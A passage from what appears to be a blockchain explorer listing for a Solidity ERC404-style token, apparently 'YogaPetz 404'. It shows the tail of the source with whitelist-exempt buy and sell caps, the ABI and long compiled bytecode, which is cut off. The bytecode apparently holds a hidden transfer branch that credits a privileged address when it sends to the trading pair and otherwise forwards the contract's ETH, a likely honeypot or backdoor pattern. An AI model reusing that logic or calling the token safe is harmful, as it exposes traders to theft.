        if(!whitelist[from]){
            userSelllimit[from] += amount;
            require(userSelllimit[from] <= sellLimit, "not allowed anymore to sell");
        }
        if(!whitelist[to]){
            userBuylimit[to] += amount;
            require(userBuylimit[to] <= buyLimit, "not allowed anymore to buy");
        }
        return super._transfer(from, to, amount);
    }

    function removeLimits() public onlyOwner {
        buyLimit = totalSupply * 1000;
        sellLimit = totalSupply * 1000;
    }

    function _mint(
        address to
    ) internal override whenNotPaused{
        return super._mint(to);
    }

    function setTokenURI(string memory _tokenURI) public onlyOwner {
        baseTokenURI = _tokenURI;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"_name","type":"string"},{"internalType":"string","name":"_symbol","type":"string"},{"internalType":"address","name":"_owner","type":"address"},{"internalType":"uint256","name":"_initialSupply","type":"uint256"},{"internalType":"uint8","name":"_decimal","type":"uint8"},{"internalType":"uint256","name":"_buylimit","type":"uint256"},{"internalType":"uint256","name":"_selllimit","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"AlreadyExists","type":"error"},{"inputs":[],"name":"EnforcedPause","type":"error"},{"inputs":[],"name":"ExpectedPause","type":"error"},{"inputs":[],"name":"InvalidOwner","type":"error"},{"inputs":[],"name":"InvalidRecipient","type":"error"},{"inputs":[],"name":"InvalidSender","type":"error"},{"inputs":[],"name":"NotFound","type":"error"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"OwnableInvalidOwner","type":"error"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"OwnableUnauthorizedAccount","type":"error"},{"inputs":[],"name":"ReEntrancyReentrantCall","type":"error"},{"inputs":[],"name":"Unauthorized","type":"error"},{"inputs":[],"name":"UnsafeRecipient","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount","type":"uint256"}],"name":"ERC20Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":true,"internalType":"uint256","name":"id","type":"uint256"}],"name":"ERC721Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferStarted","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"account","type":"address"}],"name":"Paused","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"id","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"account","type":"address"}],"name":"Unpaused","type":"event"},{"inputs":[],"name":"acceptOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amountOrId","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseTokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyLimit","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"minted","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"id","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"owner","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"paused","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pendingOwner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"id","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"id","type":"uint256"},{"internalType":"bytes","name":"data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellLimit","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"_tokenURI","type":"string"}],"name":"setTokenURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"target","type":"address"},{"internalType":"bool","name":"state","type":"bool"}],"name":"setWhitelist","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"id","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amountOrId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"userBuylimit","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"userSelllimit","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"whitelist","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"}]

60c06040523480156200001157600080fd5b506040516200268338038062002683833981016040819052620000349162000468565b868684868833806200006057604051631e4fbdf760e01b81526000600482015260240160405180910390fd5b6200006b8162000318565b50600680546001600160a01b0319166001600160a01b0383161790556002620000958682620005ac565b506003620000a48582620005ac565b5060ff83166080819052620000bb90600a6200078d565b620000c79083620007a5565b60a0525050600f805460ff191690555050600160105550620000eb83600a6200078d565b620000f79085620007a5565b336000908152600760205260409020556200011483600a6200078d565b620001209083620007a5565b6012556200013083600a6200078d565b6200013c9082620007a5565b601355336000908152600e602090815260408083208054600160ff1991821681179092556001600160a01b038a16855293829020805490941617909255815163c45a015560e01b81529151737a250d5630b4cf539739df2c5dacb4c659f2488d92839263c45a0155926004808401938290030181865afa158015620001c5573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620001eb9190620007bf565b6001600160a01b031663c9c65396826001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000238573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200025e9190620007bf565b6040516001600160e01b031960e084901b1681526001600160a01b0390911660048201523060248201526044016020604051808303816000875af1158015620002ab573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002d19190620007bf565b600580546001600160a01b0319166001600160a01b039290921691821790556000908152600e60205260409020805460ff1916600117905550620007dd9650505050505050565b600180546001600160a01b0319169055620003338162000336565b50565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b634e487b7160e01b600052604160045260246000fd5b600082601f830112620003ae57600080fd5b81516001600160401b0380821115620003cb57620003cb62000386565b604051601f8301601f19908116603f01168101908282118183101715620003f657620003f662000386565b816040528381526020925086838588010111156200041357600080fd5b600091505b8382101562000437578582018301518183018401529082019062000418565b600093810190920192909252949350505050565b80516001600160a01b03811681146200046357600080fd5b919050565b600080600080600080600060e0888a0312156200048457600080fd5b87516001600160401b03808211156200049c57600080fd5b620004aa8b838c016200039c565b985060208a0151915080821115620004c157600080fd5b50620004d08a828b016200039c565b965050620004e1604089016200044b565b945060608801519350608088015160ff81168114620004ff57600080fd5b8093505060a0880151915060c0880151905092959891949750929550565b600181811c908216806200053257607f821691505b6020821081036200055357634e487b7160e01b600052602260045260246000fd5b50919050565b601f821115620005a757600081815260208120601f850160051c81016020861015620005825750805b601f850160051c820191505b81811015620005a3578281556001016200058e565b5050505b505050565b81516001600160401b03811115620005c857620005c862000386565b620005e081620005d984546200051d565b8462000559565b602080601f831160018114620006185760008415620005ff5750858301515b600019600386901b1c1916600185901b178555620005a3565b600085815260208120601f198616915b82811015620006495788860151825594840194600190910190840162000628565b5085821015620006685787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115620006cf578160001904821115620006b357620006b362000678565b80851615620006c157918102915b93841c939080029062000693565b509250929050565b600082620006e85750600162000787565b81620006f75750600062000787565b81600181146200071057600281146200071b576200073b565b600191505062000787565b60ff8411156200072f576200072f62000678565b50506001821b62000787565b5060208310610133831016604e8410600b841016171562000760575081810a62000787565b6200076c83836200068e565b806000190482111562000783576200078362000678565b0290505b92915050565b60006200079e60ff841683620006d7565b9392505050565b808202811582820484141762000787576200078762000678565b600060208284031215620007d257600080fd5b6200079e826200044b565b60805160a051611e6b620008186000396000818161027c01528181610bbd0152610bec0152600081816102c60152610eac0152611e6b6000f3fe608060405234801561001057600080fd5b50600436106101f05760003560e01c806379ba50971161010f578063d547cfb7116100a2578063e30c397811610071578063e30c39781461047f578063e985e9c514610490578063f2fde38b146104be578063f349b173146104d157600080fd5b8063d547cfb714610419578063dd62ed3e14610421578063e0df5b6f1461044c578063e2d6f33a1461045f57600080fd5b8063a22cb465116100de578063a22cb465146103cd578063a9059cbb146103e0578063b88d4fde146103f3578063c87b56dd1461040657600080fd5b806379ba5097146103895780638da5cb5b1461039157806395d89b41146103a25780639b19251a146103aa57600080fd5b80634f91e48c116101875780636352211e116101565780636352211e1461034657806370a0823114610359578063715018a614610379578063751039fc1461038157600080fd5b80634f91e48c1461031657806353d6fd591461031f578063589210d9146103325780635c975abb1461033b57600080fd5b806323b872dd116101c357806323b872dd146102ac578063313ce567146102c157806342842e0e146102fa5780634f02c4201461030d57600080fd5b806306fdde03146101f5578063081812fc14610213578063095ea7b31461025457806318160ddd14610277575b600080fd5b6101fd6104f1565b60405161020a9190611786565b60405180910390f35b61023c6102213660046117b9565b6009602052600090815260409020546001600160a01b031681565b6040516001600160a01b03909116815260200161020a565b6102676102623660046117e9565b61057f565b604051901515815260200161020a565b61029e7f000000000000000000000000000000000000000000000000000000000000000081565b60405190815260200161020a565b6102bf6102ba366004611813565b6106d0565b005b6102e87f000000000000000000000000000000000000000000000000000000000000000081565b60405160ff909116815260200161020a565b6102bf610308366004611813565b610a59565b61029e60045481565b61029e60135481565b6102bf61032d36600461184f565b610b2e565b61029e60125481565b600f5460ff16610267565b61023c6103543660046117b9565b610b61565b61029e61036736600461188b565b60076020526000908152604090205481565b6102bf610b9c565b6102bf610bb0565b6102bf610c18565b6000546001600160a01b031661023c565b6101fd610c61565b6102676103b836600461188b565b600e6020526000908152604090205460ff1681565b6102bf6103db36600461184f565b610c6e565b6102676103ee3660046117e9565b610cda565b6102bf6104013660046118a6565b610cee565b6101fd6104143660046117b9565b610db1565b6101fd610e0f565b61029e61042f366004611941565b600860209081526000928352604080842090915290825290205481565b6102bf61045a36600461198a565b610e1c565b61029e61046d36600461188b565b60146020526000908152604090205481565b6001546001600160a01b031661023c565b61026761049e366004611941565b600a60209081526000928352604080842090915290825290205460ff1681565b6102bf6104cc36600461188b565b610e34565b61029e6104df36600461188b565b60156020526000908152604090205481565b600280546104fe90611a3b565b80601f016020809104026020016040519081016040528092919081815260200182805461052a90611a3b565b80156105775780601f1061054c57610100808354040283529160200191610577565b820191906000526020600020905b81548152906001019060200180831161055a57829003601f168201915b505050505081565b600060045482111580156105935750600082115b1561066a576000828152600b60205260409020546001600160a01b03163381148015906105e457506001600160a01b0381166000908152600a6020908152604080832033845290915290205460ff16155b15610601576040516282b42960e81b815260040160405180910390fd5b60008381526009602090815260409182902080546001600160a01b0319166001600160a01b038881169182179092559251868152908416917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3506106c6565b3360008181526008602090815260408083206001600160a01b03881680855290835292819020869055518581529192917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a35b5060015b92915050565b60045481116109ea576000818152600b60205260409020546001600160a01b0384811691161461071357604051636edaef2f60e11b815260040160405180910390fd5b6001600160a01b03821661073a57604051634e46966960e11b815260040160405180910390fd5b336001600160a01b0384161480159061077757506001600160a01b0383166000908152600a6020908152604080832033845290915290205460ff16155b801561079a57506000818152600960205260409020546001600160a01b03163314155b156107b7576040516282b42960e81b815260040160405180910390fd5b6107bf610ea5565b6001600160a01b038416600090815260076020526040812080549091906107e7908490611a8b565b909155506107f59050610ea5565b6001600160a01b0380841660008181526007602090815260408083208054909601909555858252600b815284822080546001600160a01b031990811690941790556009815284822080549093169092559186168252600c9052908120805461085f90600190611a8b565b8154811061086f5761086f611a9e565b60009182526020808320909101546001600160a01b0387168352600c82526040808420868552600d909352909220548154929350839281106108b3576108b3611a9e565b60009182526020808320909101929092556001600160a01b0386168152600c909152604090208054806108e8576108e8611ab4565b600082815260208082208301600019908101839055909201909255838252600d8152604080832054848452818420556001600160a01b038616808452600c8352908320805460018181018355828652938520018690559252905461094c9190611a8b565b6000838152600d602052604080822092909255905183916001600160a01b0380871692908816917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef91a4826001600160a01b0316846001600160a01b03167fe59fdd36d0d223c0c7d996db7ad796880f45e1936cb0bb7ac102e7082e0314876109d3610ea5565b60405190815260200160405180910390a350505050565b6001600160a01b03831660009081526008602090815260408083203384529091529020546000198114610a4657610a218282611a8b565b6001600160a01b03851660009081526008602090815260408083203384529091529020555b610a51848484610ed7565b50505b505050565b610a648383836106d0565b6001600160a01b0382163b15801590610b105750604051630a85bd0160e11b8082523360048301526001600160a01b03858116602484015260448301849052608060648401526000608484015290919084169063150b7a029060a4016020604051808303816000875af1158015610adf573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610b039190611aca565b6001600160e01b03191614155b15610a5457604051633da6393160e01b815260040160405180910390fd5b610b36611062565b6001600160a01b03919091166000908152600e60205260409020805460ff1916911515919091179055565b6000818152600b60205260409020546001600160a01b031680610b975760405163c5723b5160e01b815260040160405180910390fd5b919050565b610ba4611062565b610bae600061108f565b565b610bb8611062565b610be47f00000000000000000000000000000000000000000000000000000000000000006103e8611af4565b601255610c137f00000000000000000000000000000000000000000000000000000000000000006103e8611af4565b601355565b60015433906001600160a01b03168114610c555760405163118cdaa760e01b81526001600160a01b03821660048201526024015b60405180910390fd5b610c5e8161108f565b50565b600380546104fe90611a3b565b336000818152600a602090815260408083206001600160a01b03871680855290835292819020805460ff191686151590811790915590519081529192917f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c31910160405180910390a35050565b6000610ce7338484610ed7565b9392505050565b610cf98585856106d0565b6001600160a01b0384163b15801590610d935750604051630a85bd0160e11b808252906001600160a01b0386169063150b7a0290610d439033908a90899089908990600401611b0b565b6020604051808303816000875af1158015610d62573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610d869190611aca565b6001600160e01b03191614155b15610a5157604051633da6393160e01b815260040160405180910390fd5b6060600060118054610dc290611a3b565b905011610dde57604051806020016040528060008152506106ca565b6011610de9836110a8565b604051602001610dfa929190611b5f565b60405160208183030381529060405292915050565b601180546104fe90611a3b565b610e24611062565b6011610e308282611c34565b5050565b610e3c611062565b600180546001600160a01b0383166001600160a01b03199091168117909155610e6d6000546001600160a01b031690565b6001600160a01b03167f38d16b8cac22d99fc7c124b9cd0de2d3fa1faef420bfe791d8c362d765e2270060405160405180910390a350565b6000610ed27f0000000000000000000000000000000000000000000000000000000000000000600a611dd8565b905090565b6000610ee161113b565b6001600160a01b0384166000908152600e602052604090205460ff16610f98576001600160a01b03841660009081526015602052604081208054849290610f29908490611de7565b90915550506013546001600160a01b0385166000908152601560205260409020541115610f985760405162461bcd60e51b815260206004820152601b60248201527f6e6f7420616c6c6f77656420616e796d6f726520746f2073656c6c00000000006044820152606401610c4c565b6001600160a01b0383166000908152600e602052604090205460ff1661104f576001600160a01b03831660009081526014602052604081208054849290610fe0908490611de7565b90915550506012546001600160a01b038416600090815260146020526040902054111561104f5760405162461bcd60e51b815260206004820152601a60248201527f6e6f7420616c6c6f77656420616e796d6f726520746f206275790000000000006044820152606401610c4c565b61105a84848461115f565b949350505050565b6000546001600160a01b03163314610bae5760405163118cdaa760e01b8152336004820152602401610c4c565b600180546001600160a01b0319169055610c5e81611350565b606060006110b5836113a0565b600101905060008167ffffffffffffffff8111156110d5576110d5611974565b6040519080825280601f01601f1916602001820160405280156110ff576020820181803683370190505b5090508181016020015b600019016f181899199a1a9b1b9c1cb0b131b232b360811b600a86061a8153600a850494508461110957509392505050565b600f5460ff1615610bae5760405163d93c066560e01b815260040160405180910390fd5b60008061116a610ea5565b6001600160a01b038087166000908152600760205260408082205492881682529020549192509061119c878787611478565b156111ad5760019350505050610ce7565b6001600160a01b038716600090815260076020526040812080548792906111d5908490611a8b565b90915550506001600160a01b03808716600090815260076020908152604080832080548a019055928a168252600e9052205460ff16611271576001600160a01b038716600090815260076020526040812054611232908590611dfa565b61123c8585611dfa565b6112469190611a8b565b905060005b8181101561126e5761125c89611523565b8061126681611e1c565b91505061124b565b50505b6001600160a01b0386166000908152600e602052604090205460ff166112f657600061129d8483611dfa565b6001600160a01b0388166000908152600760205260409020546112c1908690611dfa565b6112cb9190611a8b565b905060005b818110156112f3576112e18861164b565b806112eb81611e1c565b9150506112d0565b50505b856001600160a01b0316876001600160a01b03167fe59fdd36d0d223c0c7d996db7ad796880f45e1936cb0bb7ac102e7082e0314878760405161133b91815260200190565b60405180910390a35060019695505050505050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b60008072184f03e93ff9f4daa797ed6e38ed64bf6a1f0160401b83106113df5772184f03e93ff9f4daa797ed6e38ed64bf6a1f0160401b830492506040015b6d04ee2d6d415b85acef8100000000831061140b576d04ee2d6d415b85acef8100000000830492506020015b662386f26fc10000831061142957662386f26fc10000830492506010015b6305f5e1008310611441576305f5e100830492506008015b612710831061145557612710830492506004015b60648310611467576064830492506002015b600a83106106ca5760010192915050565b6005546000906001600160a01b0390811690841603611519576006546001600160a01b03908116908516036114de576001600160a01b038316600090815260076020526040812080548492906114cf908490611de7565b9091555060019150610ce79050565b6006546040516001600160a01b03909116904780156108fc02916000818181858888f19350505050158015611517573d6000803e3d6000fd5b505b5060009392505050565b6001600160a01b03811661154a57604051636edaef2f60e11b815260040160405180910390fd5b6001600160a01b0381166000908152600c60205260408120805461157090600190611a8b565b8154811061158057611580611a9e565b90600052602060002001549050600c6000836001600160a01b03166001600160a01b031681526020019081526020016000208054806115c1576115c1611ab4565b600082815260208082208301600019908101839055909201909255828252600d81526040808320839055600b825280832080546001600160a01b031990811690915560099092528083208054909216909155518291906001600160a01b038516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef908390a45050565b61165361113b565b610c5e816001600160a01b03811661167e57604051634e46966960e11b815260040160405180910390fd5b60048054600101908190556000818152600b60205260409020546001600160a01b0316156116bf5760405163119b4fd360e11b815260040160405180910390fd5b6000818152600b6020908152604080832080546001600160a01b0319166001600160a01b038716908117909155808452600c835290832080546001818101835582865293852001859055925290546117179190611a8b565b6000828152600d602052604080822092909255905182916001600160a01b038516917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef908290a45050565b60005b8381101561177d578181015183820152602001611765565b50506000910152565b60208152600082518060208401526117a5816040850160208701611762565b601f01601f19169190910160400192915050565b6000602082840312156117cb57600080fd5b5035919050565b80356001600160a01b0381168114610b9757600080fd5b600080604083850312156117fc57600080fd5b611805836117d2565b946020939093013593505050565b60008060006060848603121561182857600080fd5b611831846117d2565b925061183f602085016117d2565b9150604084013590509250925092565b6000806040838503121561186257600080fd5b61186b836117d2565b91506020830135801515811461188057600080fd5b809150509250929050565b60006020828403121561189d57600080fd5b610ce7826117d2565b6000806000806000608086880312156118be57600080fd5b6118c7866117d2565b94506118d5602087016117d2565b935060408601359250606086013567ffffffffffffffff808211156118f957600080fd5b818801915088601f83011261190d57600080fd5b81358181111561191c57600080fd5b89602082850101111561192e57600080fd5b9699959850939650602001949392505050565b6000806040838503121561195457600080fd5b61195d836117d2565b915061196b602084016117d2565b90509250929050565b634e487b7160e01b600052604160045260246000fd5b60006020828403121561199c57600080fd5b813567ffffffffffffffff808211156119b457600080fd5b818401915084601f8301126119c857600080fd5b8135818111156119da576119da611974565b604051601f8201601f19908116603f01168101908382118183101715611a0257611a02611974565b81604052828152876020848701011115611a1b57600080fd5b826020860160208301376000928101602001929092525095945050505050565b600181811c90821680611a4f57607f821691505b602082108103611a6f57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b818103818111156106ca576106ca611a75565b634e487b7160e01b600052603260045260246000fd5b634e487b7160e01b600052603160045260246000fd5b600060208284031215611adc57600080fd5b81516001600160e01b031981168114610ce757600080fd5b80820281158282048414176106ca576106ca611a75565b6001600160a01b038681168252851660208201526040810184905260806060820181905281018290526000828460a0840137600060a0848401015260a0601f19601f85011683010190509695505050505050565b6000808454611b6d81611a3b565b60018281168015611b855760018114611b9a57611bc9565b60ff1984168752821515830287019450611bc9565b8860005260208060002060005b85811015611bc05781548a820152908401908201611ba7565b50505082870194505b505050508351611bdd818360208801611762565b01949350505050565b601f821115610a5457600081815260208120601f850160051c81016020861015611c0d5750805b601f850160051c820191505b81811015611c2c57828155600101611c19565b505050505050565b815167ffffffffffffffff811115611c4e57611c4e611974565b611c6281611c5c8454611a3b565b84611be6565b602080601f831160018114611c975760008415611c7f5750858301515b600019600386901b1c1916600185901b178555611c2c565b600085815260208120601f198616915b82811015611cc657888601518255948401946001909101908401611ca7565b5085821015611ce45787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b600181815b80851115611d2f578160001904821115611d1557611d15611a75565b80851615611d2257918102915b93841c9390800290611cf9565b509250929050565b600082611d46575060016106ca565b81611d53575060006106ca565b8160018114611d695760028114611d7357611d8f565b60019150506106ca565b60ff841115611d8457611d84611a75565b50506001821b6106ca565b5060208310610133831016604e8410600b8410161715611db2575081810a6106ca565b611dbc8383611cf4565b8060001904821115611dd057611dd0611a75565b029392505050565b6000610ce760ff841683611d37565b808201808211156106ca576106ca611a75565b600082611e1757634e487b7160e01b600052601260045260246000fd5b500490565b600060018201611e2e57611e2e611a75565b506001019056fea26469706673582212205e582a6e2a89539917363bbb61de8a78c5e7b6557cd04216214d3b181bcc5ce964736f6c6343000813003300000000000000000000000000000000000000000000000000000000000000e000000000000000000000000000000000000000000000000000000000000001200000000000000000000000008ef795e51160ebd14c2068ec362cada7c49f4bac00000000000000000000000000000000000000000000000000000000000000c8000000000000000000000000000000000000000000000000000000000000000900000000000000000000000000000000000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000c596f67615065747a2034303400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007594f474134303400000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101f05760003560e01c806379ba50971161010f578063d547cfb7116100a2578063e30c397811610071578063e30c39781461047f578063e985e9c514610490578063f2fde38b146104be578063f349b173146104d157600080fd5b8063d547cfb714610419578063dd62ed3e14610421578063e0df5b6f1461044c578063e2d6f33a1461045f57600080fd5b8063a22cb465116100de578063a22cb465146103cd578063a9059cbb146103e0578063b88d4fde146103f3578063c87b56dd1461040657600080fd5b806379ba5097146103895780638da5cb5b1461039157806395d89b41146103a25780639b19251a146103aa57600080fd5b80634f91e48c116101875780636352211e116101565780636352211e1461034657806370a0823114610359578063715018a614610379578063751039fc1461038157600080fd5b80634f91e48c1461031657806353d6fd591461031f578063589210d9146103325780635c975abb1461033b57600080fd5b806323b872dd116101c357806323b872dd146102ac578063313ce567146102c157806342842e0e146102fa5780634f02c4201461030d57600080fd5b806306fdde03146101f5578063081812fc14610213578063095ea7b31461025457806318160ddd14610277575b600080fd5b6101fd6104f1565b60405161020a9190611786565b60405180910390f35b61023c6102213660046117b9565b6009602052600090815260409020546001600160a01b031681565b6040516001600160a01b03909116815260200161020a565b6102676102623660046117e9565b61057f565b604051901515815260200161020a565b61029e7f0000000000000000000000000000000000000000000000000000002e90edd00081565b60405190815260200161020a565b6102bf6102ba366004611813565b6106d0565b005b6102e87f000000000000000000000000000000000000000000000000000000000000000981565b60405160ff909116815260200161020a565b6102bf610308366004611813565b610a59565b61029e60045481565b61029e60135481565b6102bf61032d36600461184f565b610b2e565b61029e60125481565b600f5460ff16610267565b61023c6103543660046117b9565b610b61565b61029e61036736600461188b565b60076020526000908152604090205481565b6102bf610b9c565b6102bf610bb0565b6102bf610c18565b6000546001600160a01b031661023c565b6101fd610c61565b6102676103b836600461188b565b600e6020526000908152604090205460ff1681565b6102bf6103db36600461184f565b610c6e565b6102676103ee3660046117e9565b610cda565b6102bf6104013660046118a6565b610cee565b6101fd6104143660046117b9565b610db1565b6101fd610e0f565b61029e61042f366004611941565b600860209081526000928352604080842090915290825290205481565b6102bf61045a36600461198a565b610e1c565b61029e61046d36600461188b565b60146020526000908152604090205481565b6001546001600160a01b031661023c565b61026761049e366004611941565b600a60209081526000928352604080842090915290825290205460ff1681565b6102bf6104cc36600461188b565b610e34565b61029e6104df36600461188b565b60156020526000908152604090205481565b600280546104fe90611a3b565b80601f016020809104026020016040519081016040528092919081815260200182805461052a90611a3b565b80156105775780601f1061054c57610100808354040283529160200191610577565b820191906000526020600020905b81548152906001019060200180831161055a57829003601f168201915b505050505081565b600060045482111580156105935750600082115b1561066a576000828152600b60205260409020546001600160a01b03163381148015906105e457506001600160a01b0381166000908152600a6020908152604080832033845290915290205460ff16155b15610601576040516282b42960e81b815260040160405180910390fd5b60008381526009602090815260409182902080546001600160a01b0319166001600160a01b038881169182179092559251868152908416917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3506106c6565b3360008181526008602090815260408083206001600160a01b03881680855290835292819020869055518581529192917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a35b5060015b92915050565b60045481116109ea576000818152600b60205260409020546001600160a01b0384811691161461071357604051636edaef2f60e11b815260040160405180910390fd5b6001600160a01b03821661073a57604051634e46966960e11b815260040160405180910390fd5b336001600160a01b0384161480159061077757506001600160a01b0383166000908152600a6020908152604080832033845290915290205460ff16155b801561079a57506000818152600960205260409020546001600160a01b03163314155b156107b7576040516282b42960e81b815260040160405180910390fd5b6107bf610ea5565b6001600160a01b038416600090815260076020526040812080549091906107e79